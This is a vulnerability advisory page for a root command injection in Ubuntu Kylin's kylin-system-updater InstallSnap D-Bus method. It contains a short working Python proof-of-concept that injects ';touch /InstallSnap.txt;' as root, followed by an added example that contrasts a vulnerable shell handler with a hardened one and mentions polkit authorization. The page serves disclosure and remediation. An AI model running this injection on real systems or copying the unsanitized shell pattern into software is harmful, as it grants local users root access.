| Title | UbuntuKylin OS privilege escalation vulnerability |
|---|
| Description | Description
There is a command injection vulnerability in the InstallSnap method of the update component (kylin-system-updater) of Ubuntu Kylin. The method is exposed on the D-Bus system bus (service com.kylin.systemupgrade, object path /com/kylin/systemupgrade, interface com.kylin.systemupgrade.interface) and any local user can call it. The service runs as root and its string argument reaches a shell unsanitized, so an ordinary user can execute arbitrary commands as root.
Hazard level
High
Affected version
Ubuntukylin: kylin-system-updater <= 1.4.20kord
PoC & exploit
ISO download:
https://www.ubuntukylin.com/downloads/download.php?id=91
exp.py
```
import dbus
import os

# The injected command: the ';' ends whatever command the updater builds
# around its argument and runs 'touch /InstallSnap.txt' in its place.
# '/' is writable only by root, so the file appearing there shows the
# command ran with the service's root privileges.
payload = ';touch /InstallSnap.txt;'

# kylin-system-updater exposes InstallSnap on the system bus, callable by
# any local user.
bus = dbus.SystemBus()
updater = bus.get_object('com.kylin.systemupgrade', '/com/kylin/systemupgrade')
iface = dbus.Interface(updater, dbus_interface='com.kylin.systemupgrade.interface')

# Pass the payload where the service expects a snap name.
result = iface.InstallSnap(payload)
print(result)

# Verify: the marker file exists in / and is owned by root.
os.system("ls -l /InstallSnap.txt")
``` |
|---|
| Source | https://github.com/cn-lwj/vuldb/blob/master/kylin-system-updater_vuln.md |
|---|
| User | cn-lwj (UID 42196) |
|---|
| Submitted | 03/03/2023 10:53 (3 years ago) |
|---|
| Moderated | 08/03/2023 19:06 (5 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 222600 [kylin-system-updater up to 1.4.20kord on Ubuntu Kylin Update InstallSnap Privilege Escalation] |
|---|
| Points | 20 |
|---|
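The advisory above describes the bug class (a caller-controlled D-Bus string spliced into a root shell command) but not the fix. The block below is an added example written for this page, not kylin-system-updater's source or the submitter's PoC. It assumes the real service builds a `snap install <name>` command line from the InstallSnap argument; here a harmless `echo installing` stands in for that privileged command so the demonstration runs offline and only ever writes inside a temporary directory. It shows the vulnerable handler (`shell=True` string concatenation, which lets the PoC-shaped payload run its `touch`) beside a hardened one (snap-name allowlist, then exec without a shell), and a helper that reports whether the injection succeeded against each.

```python
"""Illustrative vulnerable vs hardened InstallSnap-style handler.

Added example for this page; NOT kylin-system-updater's code. Assumption:
the real service runs 'snap install <name>' as root from the D-Bus string.
INSTALL_ARGV below is a harmless stand-in for that command.
"""
import os
import re
import subprocess
import tempfile

# Stand-in for the privileged command the updater would run (assumption).
INSTALL_ARGV = ["echo", "installing"]

# Allowlist matching snapd's naming rule: 2-40 chars, lowercase letters,
# digits and single internal hyphens, at least one letter. Every shell
# metacharacter is excluded by construction, not by a denylist.
_NAME_RE = re.compile(r"[a-z0-9]+(?:-[a-z0-9]+)*")


def is_valid_snap_name(name: str) -> bool:
    """True only for strings that can be a snap name."""
    return (
        2 <= len(name) <= 40
        and _NAME_RE.fullmatch(name) is not None
        and any(c.isalpha() for c in name)
    )


def install_vulnerable(name: str, cwd: str) -> None:
    """The bug class in the advisory: the caller's string is joined into a
    shell command line, so ';', '|', '$(...)' and friends are interpreted."""
    cmd = " ".join(INSTALL_ARGV) + " " + name
    subprocess.run(cmd, shell=True, check=True, cwd=cwd,
                   stdout=subprocess.DEVNULL)


def install_hardened(name: str, cwd: str) -> None:
    """Validate against the allowlist, then exec without a shell so the
    name reaches the program as one literal argument."""
    if not is_valid_snap_name(name):
        raise ValueError(f"refusing invalid snap name: {name!r}")
    subprocess.run(INSTALL_ARGV + [name], check=True, cwd=cwd,
                   stdout=subprocess.DEVNULL)


# Same shape as the advisory's payload, but with a relative path so the
# marker can only land in the scratch directory used below.
PAYLOAD = ";touch InstallSnap.txt;"


def injection_succeeds(installer) -> bool:
    """Call installer with PAYLOAD in a scratch directory and report whether
    the injected 'touch' actually ran (marker file present)."""
    with tempfile.TemporaryDirectory() as scratch:
        try:
            installer(PAYLOAD, scratch)
        except ValueError:
            pass  # the hardened path rejects the name before anything runs
        return os.path.exists(os.path.join(scratch, "InstallSnap.txt"))


if __name__ == "__main__":
    print("vulnerable handler, marker created:",
          injection_succeeds(install_vulnerable))
    print("hardened handler, marker created:",
          injection_succeeds(install_hardened))
```

Two caveats for anyone applying this pattern. First, the argument-list form alone is not enough if the program being invoked has its own option parsing; the allowlist is what guarantees the name cannot start with `-` or carry anything but a package name. Second, input validation does not address the other half of the advisory, that any local user may call the method at all: a privileged D-Bus service also needs an authorization check (for example a polkit policy) before it acts. To see whether an installed system falls in the affected range, compare the version shown by `dpkg -s kylin-system-updater` against 1.4.20kord.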